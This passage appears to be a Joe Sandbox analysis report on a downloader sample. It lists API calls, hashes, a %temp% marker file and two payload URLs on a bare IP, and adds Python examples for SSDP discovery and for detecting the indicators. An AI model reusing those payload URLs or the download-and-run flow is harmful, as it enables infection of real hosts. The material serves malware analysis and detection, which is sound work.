                                              • Instruction Fuzzy Hash: 8F014F712483046EE7209B96DC88F9B77A8EBC4711F508429F608961C0D7B5A9459B79
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?), ref: 0040D9B9
                                              • CloseHandle.KERNEL32(?), ref: 0040D9E8
                                              • LeaveCriticalSection.KERNEL32(?), ref: 0040D9F7
                                              • DeleteCriticalSection.KERNEL32(?), ref: 0040DA04
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                              • String ID:
                                              • API String ID: 3102160386-0
                                              • Opcode ID: ed15acf6120be580f2efb04119f98ac13af0f23ee5fa2c95d393dc01a9c3cf4d
                                              • Instruction ID: da3f5db6e059a7c592b49e611c360a1232ff957d222e4d531544d3c603d0b457
                                              • Opcode Fuzzy Hash: ed15acf6120be580f2efb04119f98ac13af0f23ee5fa2c95d393dc01a9c3cf4d
                                              • Instruction Fuzzy Hash: 2A1121B4E00208EBDB08DF94D984A9DB775FF44309F1081A9E806A7341D739EF95DB85
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                              • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                              • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                              • String ID:
                                              • API String ID: 2223660684-0
                                              • Opcode ID: 03c0a71711caba3423ec18258d7e67e7f1e7096498cee499a2df36c29d80c934
                                              • Instruction ID: 660f416c0ba452cd5c41a421238d9990710d8623252f526507a58679470d43f9
                                              • Opcode Fuzzy Hash: 03c0a71711caba3423ec18258d7e67e7f1e7096498cee499a2df36c29d80c934
                                              • Instruction Fuzzy Hash: 2301F27A242300AFC3209F26ED84A9B73F8AF85B11F00443EE546E3A50DB39E401CB28
                                              APIs
                                              • CoInitializeEx.OLE32(00000000,00000002,?,?,00407FB7), ref: 00406F78
                                              • SysAllocString.OLEAUT32(00417B18), ref: 00406F83
                                              • CoUninitialize.OLE32 ref: 00406FA8
                                                • Part of subcall function 00406FC0: SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                              • SysFreeString.OLEAUT32(00000000), ref: 00406FA2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: String$Free$AllocInitializeUninitialize
                                              • String ID:
                                              • API String ID: 459949847-0
                                              • Opcode ID: 04d1d2bcffda370cb2b5a7ceb5013a9587be47d2db71fc951fd56c3c7d876cd0
                                              • Instruction ID: 7397cee9579370c29f446d7a93da1be4fc5365a48f81cc5ba3db23e82f7acdfe
                                              • Opcode Fuzzy Hash: 04d1d2bcffda370cb2b5a7ceb5013a9587be47d2db71fc951fd56c3c7d876cd0
                                              • Instruction Fuzzy Hash: 22E0D8B4940308FBCB00DBE0ED0EB8D7734EB04315F004074F90267291DAB95E80C755
                                              APIs
                                                • Part of subcall function 00407250: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
                                              • SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFreeInstanceString
                                              • String ID: Microsoft Corporation
                                              • API String ID: 586785272-3838278685
                                              • Opcode ID: 47348544a12607a113ad889ec3bd29dddf14831e53aa8f734b6601f1a55deb08
                                              • Instruction ID: e6ff3ca51e6e637cb53d631dd4329f9e07d4b07e7a8aed38044ad589faa32fb5
                                              • Opcode Fuzzy Hash: 47348544a12607a113ad889ec3bd29dddf14831e53aa8f734b6601f1a55deb08
                                              • Instruction Fuzzy Hash: 0F91EC75A0410ADFCB04DF98C894AAFB3B5BF89304F208169E515BB3E0D774AD41CBA6
                                              APIs
                                                • Part of subcall function 0040E150: memset.NTDLL ref: 0040E178
                                                • Part of subcall function 0040E150: InternetCrackUrlA.WININET(0040DC29,00000000,10000000,0000003C), ref: 0040E1C8
                                                • Part of subcall function 0040E150: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E1D8
                                                • Part of subcall function 0040E150: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E211
                                                • Part of subcall function 0040E150: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E247
                                                • Part of subcall function 0040E150: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E26F
                                                • Part of subcall function 0040E150: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E2B8
                                                • Part of subcall function 0040E150: InternetCloseHandle.WININET(00000000), ref: 0040E347
                                                • Part of subcall function 0040E040: SysAllocString.OLEAUT32(00000000), ref: 0040E06E
                                                • Part of subcall function 0040E040: CoCreateInstance.OLE32(00412A18,00000000,00004401,00412A08,00000000), ref: 0040E096
                                                • Part of subcall function 0040E040: SysFreeString.OLEAUT32(00000000), ref: 0040E131
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040DFEB
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040DFF5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                              • String ID: %S%S
                                              • API String ID: 1017111014-3267608656
                                              • Opcode ID: 8050ae28274428bf3bfa8973c943a31095365cba4dcb11065546cc064dfc1af3
                                              • Instruction ID: 0d7a9dfb02ef55e8037a527aa51067439edd5703c05fc0bf7ce6e387078fb77b
                                              • Opcode Fuzzy Hash: 8050ae28274428bf3bfa8973c943a31095365cba4dcb11065546cc064dfc1af3
                                              • Instruction Fuzzy Hash: 3E416BB5E002099FCB04DBE5C885AEFB7B4BF88304F108929E505B7391D778AA45CBA1
                                              APIs
                                              • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407FB2), ref: 0040DBDA
                                                • Part of subcall function 0040DCA0: socket.WS2_32(00000002,00000002,00000011), ref: 0040DCBA
                                                • Part of subcall function 0040DCA0: htons.WS2_32(0000076C), ref: 0040DCF0
                                                • Part of subcall function 0040DCA0: inet_addr.WS2_32(239.255.255.250), ref: 0040DCFF
                                                • Part of subcall function 0040DCA0: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DD1D
                                                • Part of subcall function 0040DCA0: bind.WS2_32(000000FF,?,00000010), ref: 0040DD53
                                                • Part of subcall function 0040DCA0: lstrlenA.KERNEL32(00411D70,00000000,?,00000010), ref: 0040DD6C
                                                • Part of subcall function 0040DCA0: sendto.WS2_32(000000FF,00411D70,00000000), ref: 0040DD7B
                                                • Part of subcall function 0040DCA0: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DD95
                                                • Part of subcall function 0040DF10: SysFreeString.OLEAUT32(00000000), ref: 0040DFEB
                                                • Part of subcall function 0040DF10: SysFreeString.OLEAUT32(00000000), ref: 0040DFF5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                              • String ID: TCP$UDP
                                              • API String ID: 1519345861-1097902612
                                              • Opcode ID: eec8d27479aca65ce9d536c40e716b47b94f3bf0f210a133f1cac4c1684116a5
                                              • Instruction ID: a00cbb5bcfca6c5959655f637b3ec774768ac2685424fa301eff230043eb3e38
                                              • Opcode Fuzzy Hash: eec8d27479aca65ce9d536c40e716b47b94f3bf0f210a133f1cac4c1684116a5
                                              • Instruction Fuzzy Hash: A011B4B4D04208EBEB00EBD4DD85FAE7774EB44308F14886EE511772C2D6B86A54DB59
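The socket sequence listed for the subcall at 0040DCA0 is the standard SSDP multicast discovery: a UDP socket, htons(0x76C) = port 1900, inet_addr("239.255.255.250"), setsockopt(SOL_SOCKET = 0xFFFF, SO_BROADCAST = 0x20), bind, sendto, and ioctlsocket with FIONBIO (0x8004667E) to switch to non-blocking mode. Together with the "TCP$UDP" strings in the same function this is consistent with locating a UPnP gateway before requesting a port mapping. The following is an added example, not code from the sample or from the Joe Sandbox report: it builds the M-SEARCH datagram such a sequence transmits, parses the unicast reply a gateway sends back, and refuses a LOCATION that does not point at the replying host (the way a rogue SSDP responder steers the follow-up HTTP request elsewhere). The search target string and the reply are constructed here so the parsing runs offline; the live send path is kept in a separate function.

```python
import socket
from typing import Dict, Optional
from urllib.parse import urlparse

SSDP_GROUP = "239.255.255.250"   # multicast group passed to inet_addr in the sample
SSDP_PORT = 1900                 # htons(0x76C) in the sample
FIONBIO = 0x8004667E             # ioctlsocket request seen in the sample (non-blocking)

# Search target for an Internet Gateway Device. The sample's own ST value is not
# visible in the report, so this is an assumption based on typical port-mapping code.
IGD_ST = "urn:schemas-upnp-org:device:InternetGatewayDevice:1"


def build_msearch(st: str = IGD_ST, mx: int = 2) -> bytes:
    """Build the SSDP M-SEARCH datagram sent to 239.255.255.250:1900."""
    lines = [
        "M-SEARCH * HTTP/1.1",
        f"HOST: {SSDP_GROUP}:{SSDP_PORT}",
        'MAN: "ssdp:discover"',
        f"MX: {mx}",
        f"ST: {st}",
        "", "",                       # terminating CRLF CRLF
    ]
    return "\r\n".join(lines).encode("ascii")


def parse_ssdp_response(datagram: bytes) -> Optional[Dict[str, str]]:
    """Parse an SSDP unicast reply into a header dict (names upper-cased).

    Returns None for anything that is not an HTTP/1.1 200 OK response.
    """
    try:
        text = datagram.decode("ascii")
    except UnicodeDecodeError:
        return None
    head, _, _ = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    if not lines or not lines[0].startswith("HTTP/1.1 200"):
        return None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().upper()] = value.strip()
    return headers


def gateway_description_url(headers: Dict[str, str], reply_src: str) -> Optional[str]:
    """Return LOCATION only if it is plain HTTP and points back at the replying host.

    A LOCATION on another host is how a rogue responder redirects the follow-up
    description fetch; code that trusts it blindly talks to an attacker's device.
    """
    location = headers.get("LOCATION")
    if not location:
        return None
    parsed = urlparse(location)
    if parsed.scheme != "http" or parsed.hostname != reply_src:
        return None
    return location


def discover(timeout: float = 2.0):
    """Live discovery (not exercised offline): mirrors the sample's socket sequence."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    s.bind(("", 0))
    s.sendto(build_msearch(), (SSDP_GROUP, SSDP_PORT))
    s.settimeout(timeout)         # stands in for ioctlsocket(FIONBIO) plus a poll loop
    found = []
    try:
        while True:
            data, (src, _) = s.recvfrom(4096)
            hdrs = parse_ssdp_response(data)
            if hdrs:
                found.append((src, gateway_description_url(hdrs, src)))
    except socket.timeout:
        pass
    finally:
        s.close()
    return found


# Constructed reply (not captured from the sample): what a typical IGD answers.
SAMPLE_REPLY = (
    b"HTTP/1.1 200 OK\r\n"
    b"CACHE-CONTROL: max-age=120\r\n"
    b"ST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
    b"USN: uuid:0000-1111::urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
    b"EXT:\r\n"
    b"SERVER: Linux/3.x UPnP/1.0 MiniUPnPd/2.0\r\n"
    b"LOCATION: http://192.168.1.1:5000/rootDesc.xml\r\n"
    b"\r\n"
)
```

The host check in gateway_description_url is the part worth keeping when instrumenting or emulating this behaviour: a sandbox that answers SSDP can feed the sample any LOCATION, and the sample's next request reveals whether it validates the reply at all.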
                                              APIs
                                              • EnterCriticalSection.KERNEL32(004174D8,?,00000000,?), ref: 00405E5F
                                              • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405E9E
                                              • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F13
                                              • LeaveCriticalSection.KERNEL32(004174D8), ref: 00405F30
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSectionmemcpy$EnterLeave
                                              • String ID:
                                              • API String ID: 469056452-0
                                              • Opcode ID: 4996b29259c9349675d46381685df80cb9fbc453c004c8ef9eea7ef5662ad9f1
                                              • Instruction ID: 40e991b6b4618cd04087b2a5cfa683f62b0bf83616b4f0bda180c9645beb9567
                                              • Opcode Fuzzy Hash: 4996b29259c9349675d46381685df80cb9fbc453c004c8ef9eea7ef5662ad9f1
                                              • Instruction Fuzzy Hash: C2218B70904208ABCB04DB94D885BDEBBB5EB94304F1481BAE845672C1C77CAA85CB9A

                                              Execution Graph

                                               Execution Coverage: 35%
                                               Dynamic/Decrypted Code Coverage: 0%
                                               Signature Coverage: 11.5%
                                               Total number of Nodes: 113
                                               Total number of Limit Nodes: 3
                                               execution_graph (rendered interactively in the original report; the raw node/edge list is omitted). Functions and the APIs reached along each path, recovered from that list:
                                               • 006E19F7 (CRT startup): __set_app_type, _encode_pointer, __p__fmode, __p__commode, _pre_c_init, __RTC_Initialize, __setusermatherr, _controlfp_s, _invoke_watson, _configthreadlocale
                                               • 006E1819 (CRT main wrapper): GetStartupInfoW, InterlockedCompareExchange, Sleep, _amsg_exit, _initterm_e, _initterm, InterlockedExchange, __IsNonwritableInCurrentImage, exit, _cexit, __onexit; enters the program body at 006E16A0
                                               • 006E17CE: __wgetmainargs, _amsg_exit, _decode_pointer, _onexit, __onexit, _unlock
                                               • 006E1AD8 / 006E1E58: GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter
                                               • 006E16A0 (program body): Sleep; then, in sequence, 006E10B0, 006E1230, 006E1150, 006E1742 (wsprintfA, strcmp), 006E12F0, 006E14E0 and 006E1640
                                               • 006E10B0: ExpandEnvironmentStringsW, wsprintfW, PathFileExistsW, CreateFileW, CloseHandle
                                               • 006E1230: GetLogicalDrives, RegOpenKeyExW, RegQueryValueExW, RegCloseKey
                                               • 006E1150 / 006E11B0: GetDriveTypeW, QueryDosDeviceW, StrCmpNW, lstrcpyW
                                               • 006E14E0: memset, GetModuleHandleW, GetProcAddress, GetVersionExA (two call sites)
                                               • 006E12F0 (25 API calls): InternetOpenUrlW, CreateFileW, InternetReadFile, WriteFile, CloseHandle, wsprintfW, DeleteFileW, InternetCloseHandle; calls 006E1000
                                               • 006E1000: memset, CreateProcessW, Sleep, ShellExecuteW
                                               • 006E1640: calls 006E12F0
                                               • 006E19A6: _exit, _cexit, __onexit
                                               • 006E1B24: SetUnhandledExceptionFilter; 006E1E05: _except_handler4_common; 006E1AE2: ?terminate@; 006E1992: _XcptFilter

                                              Callgraph

                                              Control-flow Graph

                                              APIs
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 006E10CA
                                              • wsprintfW.USER32 ref: 006E10E3
                                              • PathFileExistsW.KERNELBASE(?), ref: 006E10F3
                                              • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 006E1119
                                              • CloseHandle.KERNELBASE(000000FF), ref: 006E1135
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2367181590.00000000006E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true
                                               • Associated: 00000006.00000002.2367167524.00000000006E0000.00000002.00000001.01000000.00000007.sdmp
                                               • Associated: 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                               • Associated: 00000006.00000002.2367211185.00000000006E4000.00000004.00000001.01000000.00000007.sdmp
                                               • Associated: 00000006.00000002.2367223368.00000000006E5000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6e0000_158752420.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                              • String ID: %s\afaefefaeff.txt$%temp%
                                              • API String ID: 750032643-3182922545
                                              • Opcode ID: 2e084f7c60150b48aed201b5480923c8e7b0fecd98a9bad3c0e1cde9c144cf8f
                                              • Instruction ID: bffd66e87146524a25c507e8736082c651f1cd9ecc74feb6db9c479d75238e07
                                              • Opcode Fuzzy Hash: 2e084f7c60150b48aed201b5480923c8e7b0fecd98a9bad3c0e1cde9c144cf8f
                                              • Instruction Fuzzy Hash: B801A7B0540368BBD720DB60DC8EFE57339AB45700F4045D8A7159B2D1D6B05BC59FA4

                                              Control-flow Graph

                                               control_flow_graph for 006E1230 (rendered interactively in the original report with executed and not-executed blocks colour-coded; the raw edge list is omitted). Basic blocks: 006E1230-006E125B GetLogicalDrives; 006E1266-006E126A (loop head); 006E126C-006E128C RegOpenKeyExW; 006E128E-006E12B9 RegQueryValueExW; 006E12BB-006E12BF and 006E12C1-006E12C7 (result checks); 006E12CA-006E12CE RegCloseKey; 006E12D4 (back edge to the loop head); 006E12D6-006E12E1 (exit).
                                              APIs
                                              • GetLogicalDrives.KERNELBASE ref: 006E1236
                                              • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 006E1284
                                              • RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 006E12B1
                                              • RegCloseKey.KERNELBASE(?), ref: 006E12CE
                                              Strings
                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 006E1277
                                              • NoDrives, xrefs: 006E12A8
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2367181590.00000000006E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true
                                               • Associated: 00000006.00000002.2367167524.00000000006E0000.00000002.00000001.01000000.00000007.sdmp
                                               • Associated: 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                               • Associated: 00000006.00000002.2367211185.00000000006E4000.00000004.00000001.01000000.00000007.sdmp
                                               • Associated: 00000006.00000002.2367223368.00000000006E5000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6e0000_158752420.jbxd
                                              Similarity
                                              • API ID: CloseDrivesLogicalOpenQueryValue
                                              • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                              • API String ID: 2666887985-3471754645
                                              • Opcode ID: cb3eb19471340dbb0cc85263514b2d42b9a0b62ecb1b2306af018bbd07bb36d5
                                              • Instruction ID: 6affc4b36772b3618830666eda28d376fc8f7c8f083f605eed730282bcc53c10
                                              • Opcode Fuzzy Hash: cb3eb19471340dbb0cc85263514b2d42b9a0b62ecb1b2306af018bbd07bb36d5
                                              • Instruction Fuzzy Hash: C011D870E0135A9FDB10CFD1C989BEEBBB5BB09704F104548E611AB280D7786A45DF91

                                              Control-flow Graph

                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 006E16AE
                                                • Part of subcall function 006E10B0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 006E10CA
                                                • Part of subcall function 006E10B0: wsprintfW.USER32 ref: 006E10E3
                                                • Part of subcall function 006E10B0: PathFileExistsW.KERNELBASE(?), ref: 006E10F3
                                                • Part of subcall function 006E1230: GetLogicalDrives.KERNELBASE ref: 006E1236
                                                • Part of subcall function 006E1230: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 006E1284
                                                • Part of subcall function 006E1230: RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 006E12B1
                                                • Part of subcall function 006E1230: RegCloseKey.KERNELBASE(?), ref: 006E12CE
                                              • wsprintfA.USER32 ref: 006E1755
                                              • strcmp.MSVCR90 ref: 006E176A
                                                • Part of subcall function 006E1150: lstrcpyW.KERNEL32(?,?), ref: 006E11A3
                                              Strings
                                              • http://91.202.233.141/lksrv.exe, xrefs: 006E178F
                                              • http://91.202.233.141/lkdrv.exe, xrefs: 006E1776
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2367181590.00000000006E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true
                                               • Associated: 00000006.00000002.2367167524.00000000006E0000.00000002.00000001.01000000.00000007.sdmp
                                               • Associated: 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                               • Associated: 00000006.00000002.2367211185.00000000006E4000.00000004.00000001.01000000.00000007.sdmp
                                               • Associated: 00000006.00000002.2367223368.00000000006E5000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6e0000_158752420.jbxd
                                              Similarity
                                              • API ID: wsprintf$CloseDrivesEnvironmentExistsExpandFileLogicalOpenPathQuerySleepStringsValuelstrcpystrcmp
                                              • String ID: http://91.202.233.141/lkdrv.exe$http://91.202.233.141/lksrv.exe
                                              • API String ID: 357889991-2508253401
                                              • Opcode ID: 580ee8f97e162e35365d21644bd13a2eed5206328c312eead0efbe7ae600a1ae
                                              • Instruction ID: 83ea9edf5a6304047fa163fad7825a8f12fabe5e2a76b3e27780a6f4ebfb00eb
                                              • Opcode Fuzzy Hash: 580ee8f97e162e35365d21644bd13a2eed5206328c312eead0efbe7ae600a1ae
                                              • Instruction Fuzzy Hash: 5821B6B4D023A89BCB60EB669C4D7AE7376AB05700F1441DCE5199F342DA309B84AF51
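Two host-observable indicators of the second-stage process are documented in the blocks above: the marker file it checks and creates in %temp% (afaefefaeff.txt, via ExpandEnvironmentStringsW, PathFileExistsW and CreateFileW with GENERIC_WRITE and CREATE_ALWAYS) and the two payload URLs it requests over plain HTTP to a bare IP (http://91.202.233.141/lkdrv.exe and http://91.202.233.141/lksrv.exe). The following added example, which is not part of the Joe Sandbox report, turns those observations into detection logic: it parses constructed key=value log lines in the shape a normalised Sysmon/proxy pipeline might emit (the field names ts, host, type, path, url and dst are assumptions), classifies each line against the indicators, and correlates per host so that a marker-file write plus a payload download is reported with more confidence than a bare connection to the IP.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Indicators taken from the report: the marker file written to %temp% and the two
# payload URLs. Anchored regexes keep a filename like "xafaefefaeff.txt" from matching.
MARKER_FILE_RE = re.compile(r"\\temp\\afaefefaeff\.txt$", re.IGNORECASE)
PAYLOAD_URL_RE = re.compile(r"^http://91\.202\.233\.141/(lkdrv|lksrv)\.exe$", re.IGNORECASE)
PAYLOAD_HOST = "91.202.233.141"


def parse_kv_line(line: str) -> Dict[str, str]:
    """Parse one 'key=value key="quoted value"' log line into a dict."""
    fields: Dict[str, str] = {}
    for m in re.finditer(r'(\w+)=("([^"]*)"|(\S+))', line):
        fields[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(4)
    return fields


def classify(event: Dict[str, str]) -> List[str]:
    """Return the indicator names one event matches (possibly none)."""
    hits: List[str] = []
    if event.get("type") == "file_create" and MARKER_FILE_RE.search(event.get("path", "")):
        hits.append("phorpiex_marker_file")
    if event.get("type") == "http" and PAYLOAD_URL_RE.match(event.get("url", "")):
        hits.append("phorpiex_payload_url")
    elif event.get("type") in ("http", "netconn") and event.get("dst") == PAYLOAD_HOST:
        # Weaker signal: traffic to the hosting IP without the exact payload path.
        hits.append("phorpiex_payload_host")
    return hits


def correlate(lines: List[str]) -> Dict[str, dict]:
    """Group indicator hits per host.

    A host showing both the marker-file write and a payload-URL fetch is
    'confirmed'; any other host with at least one hit is 'suspect'.
    """
    per_host: Dict[str, Dict[str, List[str]]] = defaultdict(lambda: defaultdict(list))
    for raw in lines:
        ev = parse_kv_line(raw)
        for name in classify(ev):
            per_host[ev.get("host", "?")][name].append(ev.get("ts", "?"))
    verdicts: Dict[str, dict] = {}
    strong = {"phorpiex_marker_file", "phorpiex_payload_url"}
    for host, hits in per_host.items():
        level = "confirmed" if strong <= set(hits) else "suspect"
        verdicts[host] = {"level": level, "hits": sorted(hits)}
    return verdicts


# Constructed log lines (not from the report); backslashes are doubled for Python.
SAMPLE_LOG = [
    'ts=2024-09-14T10:01:02Z host=ws01 type=file_create pid=4120 '
    'path="C:\\Users\\bob\\AppData\\Local\\Temp\\afaefefaeff.txt"',
    'ts=2024-09-14T10:01:03Z host=ws01 type=http pid=4120 dst=91.202.233.141 '
    'url="http://91.202.233.141/lkdrv.exe" status=200',
    'ts=2024-09-14T10:01:09Z host=ws02 type=netconn pid=880 dst=91.202.233.141 dport=80',
    'ts=2024-09-14T10:02:00Z host=ws03 type=file_create pid=300 '
    'path="C:\\Users\\eve\\AppData\\Local\\Temp\\report.txt"',
]
```

The marker file is the more durable of the two indicators for triage: the download IP can change between builds, but a file check like the one at 006E10B0 has to use the same name on every host the stage runs on, so a file-create rule on it keeps working after the URL has rotated.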

                                              Control-flow Graph

                                               control_flow_graph for 006E11B0 (rendered interactively in the original report with executed and not-executed blocks colour-coded; the raw edge list is omitted). Basic blocks: 006E11B0-006E11D6 GetDriveTypeW; 006E11D8-006E11DF, 006E11E1-006E11E8 and 006E11EA (drive-type checks, each able to branch to the exit); 006E11EC-006E1204 QueryDosDeviceW; 006E1206-006E121C StrCmpNW; 006E121E; 006E1225-006E122B (exit).
                                              APIs
                                              • GetDriveTypeW.KERNELBASE(006E118F), ref: 006E11BD
                                              • QueryDosDeviceW.KERNELBASE(006E118F,?,00000208), ref: 006E11FC
                                              • StrCmpNW.KERNELBASE(?,\??\,00000004), ref: 006E1214
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2367181590.00000000006E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true
                                               • Associated: 00000006.00000002.2367167524.00000000006E0000.00000002.00000001.01000000.00000007.sdmp
                                               • Associated: 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
